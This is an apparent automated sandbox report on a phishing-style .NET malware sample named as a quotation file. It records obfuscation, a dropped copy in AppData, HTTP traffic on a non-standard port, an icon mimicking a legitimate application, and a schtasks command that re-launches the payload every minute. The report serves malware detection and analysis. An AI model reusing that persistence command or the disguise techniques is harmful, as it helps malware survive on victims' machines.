                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1096:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5156:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: QUOTATION 061622.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: QUOTATION 061622.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Binary or sample is protected by dotNetProtector
                        Source: QUOTATION 061622.exeString found in binary or memory: dotNetProtector
                        Source: QUOTATION 061622.exe, 00000000.00000002.481602572.0000000000B72000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: dotNetProtector
                        Source: QUOTATION 061622.exe, 00000000.00000002.481602572.0000000000B72000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: _qSystem.LinqKoreanCalendarDefaultCalendarMinEraYearRightCharTryParseHebrewNumberStringReaderMethodBodyReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderIMDTokenProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderITypeDefFinder__DateBufferCreateFallbackBuffer_InputBufferlpBfdsdhsdsdsfufferResourceManagerDebuggerValueClassMarshalerm_taskSchedulerDomainNameHelperTypeRefUserGenericParamConstraintUserget_IsPointerBitConverterGet_IssuerM_IsCorrelationMgrGetTokenForFloorParsingErrorTkCtorDynamicILGenerator.ctor.cctordotNetProtectorGet_IsStaticConstructorget_IsConstructorM_isDefaultConstructorCreateDecryptor_methodPtrFromBase64CharPtrIntPtrhasPropertyPtrGetMarshalAsfagfdgdasM_erasAbsSet_CharacteristicsSystem.DiagnosticsdsdsdhddsPreserveParamRidsInitializeMethodsGetMethodsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourceslirSmfbdda.resourcesbInhderitfdfHandlesInternalGetSubKeyNamesM_iEndLinesGet_HasScopesMemberTypesM_parameterTypesEmptyTypess_NameCachedCultureslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesCodeStartOffsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsCryptAcquireContextFlagsResolveEventArgsfhddsdhsEndWriteChunksEquals<>3__tpwItemsSystem.Windows.Forms
                        Source: QUOTATION 061622.exe, 00000000.00000000.419307986.0000000000B72000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: dotNetProtector
                        Source: QUOTATION 061622.exe, 00000000.00000000.419307986.0000000000B72000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: _qSystem.LinqKoreanCalendarDefaultCalendarMinEraYearRightCharTryParseHebrewNumberStringReaderMethodBodyReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderIMDTokenProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderITypeDefFinder__DateBufferCreateFallbackBuffer_InputBufferlpBfdsdhsdsdsfufferResourceManagerDebuggerValueClassMarshalerm_taskSchedulerDomainNameHelperTypeRefUserGenericParamConstraintUserget_IsPointerBitConverterGet_IssuerM_IsCorrelationMgrGetTokenForFloorParsingErrorTkCtorDynamicILGenerator.ctor.cctordotNetProtectorGet_IsStaticConstructorget_IsConstructorM_isDefaultConstructorCreateDecryptor_methodPtrFromBase64CharPtrIntPtrhasPropertyPtrGetMarshalAsfagfdgdasM_erasAbsSet_CharacteristicsSystem.DiagnosticsdsdsdhddsPreserveParamRidsInitializeMethodsGetMethodsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourceslirSmfbdda.resourcesbInhderitfdfHandlesInternalGetSubKeyNamesM_iEndLinesGet_HasScopesMemberTypesM_parameterTypesEmptyTypess_NameCachedCultureslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesCodeStartOffsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsCryptAcquireContextFlagsResolveEventArgsfhddsdhsEndWriteChunksEquals<>3__tpwItemsSystem.Windows.Forms
                        Source: Data.exe, 0000000E.00000000.497633668.0000000000F82000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: dotNetProtector
                        Source: Data.exe, 0000000E.00000000.497633668.0000000000F82000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: _qSystem.LinqKoreanCalendarDefaultCalendarMinEraYearRightCharTryParseHebrewNumberStringReaderMethodBodyReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderIMDTokenProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderITypeDefFinder__DateBufferCreateFallbackBuffer_InputBufferlpBfdsdhsdsdsfufferResourceManagerDebuggerValueClassMarshalerm_taskSchedulerDomainNameHelperTypeRefUserGenericParamConstraintUserget_IsPointerBitConverterGet_IssuerM_IsCorrelationMgrGetTokenForFloorParsingErrorTkCtorDynamicILGenerator.ctor.cctordotNetProtectorGet_IsStaticConstructorget_IsConstructorM_isDefaultConstructorCreateDecryptor_methodPtrFromBase64CharPtrIntPtrhasPropertyPtrGetMarshalAsfagfdgdasM_erasAbsSet_CharacteristicsSystem.DiagnosticsdsdsdhddsPreserveParamRidsInitializeMethodsGetMethodsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourceslirSmfbdda.resourcesbInhderitfdfHandlesInternalGetSubKeyNamesM_iEndLinesGet_HasScopesMemberTypesM_parameterTypesEmptyTypess_NameCachedCultureslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesCodeStartOffsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsCryptAcquireContextFlagsResolveEventArgsfhddsdhsEndWriteChunksEquals<>3__tpwItemsSystem.Windows.Forms
                        Source: Data.exe, 0000000E.00000002.581973929.0000000000F82000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: dotNetProtector
                        Source: Data.exe, 0000000E.00000002.581973929.0000000000F82000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: _qSystem.LinqKoreanCalendarDefaultCalendarMinEraYearRightCharTryParseHebrewNumberStringReaderMethodBodyReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderIMDTokenProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderITypeDefFinder__DateBufferCreateFallbackBuffer_InputBufferlpBfdsdhsdsdsfufferResourceManagerDebuggerValueClassMarshalerm_taskSchedulerDomainNameHelperTypeRefUserGenericParamConstraintUserget_IsPointerBitConverterGet_IssuerM_IsCorrelationMgrGetTokenForFloorParsingErrorTkCtorDynamicILGenerator.ctor.cctordotNetProtectorGet_IsStaticConstructorget_IsConstructorM_isDefaultConstructorCreateDecryptor_methodPtrFromBase64CharPtrIntPtrhasPropertyPtrGetMarshalAsfagfdgdasM_erasAbsSet_CharacteristicsSystem.DiagnosticsdsdsdhddsPreserveParamRidsInitializeMethodsGetMethodsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourceslirSmfbdda.resourcesbInhderitfdfHandlesInternalGetSubKeyNamesM_iEndLinesGet_HasScopesMemberTypesM_parameterTypesEmptyTypess_NameCachedCultureslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesCodeStartOffsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsCryptAcquireContextFlagsResolveEventArgsfhddsdhsEndWriteChunksEquals<>3__tpwItemsSystem.Windows.Forms
                        Source: Data.exe, 0000001F.00000002.694768083.0000000000F82000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: dotNetProtector
                        Source: Data.exe, 0000001F.00000002.694768083.0000000000F82000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: _qSystem.LinqKoreanCalendarDefaultCalendarMinEraYearRightCharTryParseHebrewNumberStringReaderMethodBodyReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderIMDTokenProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderITypeDefFinder__DateBufferCreateFallbackBuffer_InputBufferlpBfdsdhsdsdsfufferResourceManagerDebuggerValueClassMarshalerm_taskSchedulerDomainNameHelperTypeRefUserGenericParamConstraintUserget_IsPointerBitConverterGet_IssuerM_IsCorrelationMgrGetTokenForFloorParsingErrorTkCtorDynamicILGenerator.ctor.cctordotNetProtectorGet_IsStaticConstructorget_IsConstructorM_isDefaultConstructorCreateDecryptor_methodPtrFromBase64CharPtrIntPtrhasPropertyPtrGetMarshalAsfagfdgdasM_erasAbsSet_CharacteristicsSystem.DiagnosticsdsdsdhddsPreserveParamRidsInitializeMethodsGetMethodsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourceslirSmfbdda.resourcesbInhderitfdfHandlesInternalGetSubKeyNamesM_iEndLinesGet_HasScopesMemberTypesM_parameterTypesEmptyTypess_NameCachedCultureslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesCodeStartOffsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsCryptAcquireContextFlagsResolveEventArgsfhddsdhsEndWriteChunksEquals<>3__tpwItemsSystem.Windows.Forms
                        Source: Data.exe, 0000001F.00000000.625893494.0000000000F82000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: dotNetProtector
                        Source: Data.exe, 0000001F.00000000.625893494.0000000000F82000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: _qSystem.LinqKoreanCalendarDefaultCalendarMinEraYearRightCharTryParseHebrewNumberStringReaderMethodBodyReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderIMDTokenProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderITypeDefFinder__DateBufferCreateFallbackBuffer_InputBufferlpBfdsdhsdsdsfufferResourceManagerDebuggerValueClassMarshalerm_taskSchedulerDomainNameHelperTypeRefUserGenericParamConstraintUserget_IsPointerBitConverterGet_IssuerM_IsCorrelationMgrGetTokenForFloorParsingErrorTkCtorDynamicILGenerator.ctor.cctordotNetProtectorGet_IsStaticConstructorget_IsConstructorM_isDefaultConstructorCreateDecryptor_methodPtrFromBase64CharPtrIntPtrhasPropertyPtrGetMarshalAsfagfdgdasM_erasAbsSet_CharacteristicsSystem.DiagnosticsdsdsdhddsPreserveParamRidsInitializeMethodsGetMethodsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourceslirSmfbdda.resourcesbInhderitfdfHandlesInternalGetSubKeyNamesM_iEndLinesGet_HasScopesMemberTypesM_parameterTypesEmptyTypess_NameCachedCultureslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesCodeStartOffsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsCryptAcquireContextFlagsResolveEventArgsfhddsdhsEndWriteChunksEquals<>3__tpwItemsSystem.Windows.Forms
                        Source: QUOTATION 061622.exeString found in binary or memory: dotNetProtector
                        Source: QUOTATION 061622.exeString found in binary or memory: _qSystem.LinqKoreanCalendarDefaultCalendarMinEraYearRightCharTryParseHebrewNumberStringReaderMethodBodyReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderIMDTokenProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderITypeDefFinder__DateBufferCreateFallbackBuffer_InputBufferlpBfdsdhsdsdsfufferResourceManagerDebuggerValueClassMarshalerm_taskSchedulerDomainNameHelperTypeRefUserGenericParamConstraintUserget_IsPointerBitConverterGet_IssuerM_IsCorrelationMgrGetTokenForFloorParsingErrorTkCtorDynamicILGenerator.ctor.cctordotNetProtectorGet_IsStaticConstructorget_IsConstructorM_isDefaultConstructorCreateDecryptor_methodPtrFromBase64CharPtrIntPtrhasPropertyPtrGetMarshalAsfagfdgdasM_erasAbsSet_CharacteristicsSystem.DiagnosticsdsdsdhddsPreserveParamRidsInitializeMethodsGetMethodsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourceslirSmfbdda.resourcesbInhderitfdfHandlesInternalGetSubKeyNamesM_iEndLinesGet_HasScopesMemberTypesM_parameterTypesEmptyTypess_NameCachedCultureslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesCodeStartOffsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsCryptAcquireContextFlagsResolveEventArgsfhddsdhsEndWriteChunksEquals<>3__tpwItemsSystem.Windows.Forms
                        Source: Data.exe.10.drString found in binary or memory: dotNetProtector
                        Source: Data.exe.10.drString found in binary or memory: _qSystem.LinqKoreanCalendarDefaultCalendarMinEraYearRightCharTryParseHebrewNumberStringReaderMethodBodyReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderIMDTokenProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderITypeDefFinder__DateBufferCreateFallbackBuffer_InputBufferlpBfdsdhsdsdsfufferResourceManagerDebuggerValueClassMarshalerm_taskSchedulerDomainNameHelperTypeRefUserGenericParamConstraintUserget_IsPointerBitConverterGet_IssuerM_IsCorrelationMgrGetTokenForFloorParsingErrorTkCtorDynamicILGenerator.ctor.cctordotNetProtectorGet_IsStaticConstructorget_IsConstructorM_isDefaultConstructorCreateDecryptor_methodPtrFromBase64CharPtrIntPtrhasPropertyPtrGetMarshalAsfagfdgdasM_erasAbsSet_CharacteristicsSystem.DiagnosticsdsdsdhddsPreserveParamRidsInitializeMethodsGetMethodsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourceslirSmfbdda.resourcesbInhderitfdfHandlesInternalGetSubKeyNamesM_iEndLinesGet_HasScopesMemberTypesM_parameterTypesEmptyTypess_NameCachedCultureslpProcdesdhsAttdsdfsdfributeslphfdhThrdsedfdadAttributesMethodAttributesTypeAttributesMethodImplAttributesGetCustomAttributesGetBytesCodeStartOffsBindingFlagsdwCrefdfationFlagsGetMethodImplementationFlagsSetImplementationFlagsCryptAcquireContextFlagsResolveEventArgsfhddsdhsEndWriteChunksEquals<>3__tpwItemsSystem.Windows.Forms
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_00B78F63 push ecx; iretd 0_2_00B78F64
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_00B78EAE pushad ; iretd 0_2_00B78EAF
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_02812C9F pushad ; iretd 0_2_0281794D
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_0281E48D pushad ; iretd 0_2_0281E4AD
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_0281E85C push edx; iretd 0_2_0281E85D
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_04D906AC push esp; iretd 0_2_04D906CB
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_04E24CA7 push ds; iretd 0_2_04E24CA9
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeCode function: 0_2_04E35090 push es; retf 0_2_04E35132
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BFCD67 push cs; ret 5_2_09BFCD6A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BFC198 push es; ret 5_2_09BFC19A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BFC190 push es; ret 5_2_09BFC196
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BFE1F8 push eax; retf 5_2_09BFE1F9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BFE1F0 pushad ; retf 5_2_09BFE1F1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BFC141 push es; ret 5_2_09BFC142
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_09BFB5E0 push cs; ret 5_2_09BFB5F4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0A8F43B9 push eax; retf 5_2_0A8F43BD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0A8F35B8 push eax; ret 5_2_0A8F35C9
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Data\Data.exeJump to dropped file

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Icon mismatch, binary includes an icon from a different legit application in order to fool users
                        Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (67).png
                        Uses known network protocols on non-standard ports
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49915
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49915
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49917
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49917
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49918
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49918
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 17910
                        Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49918
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
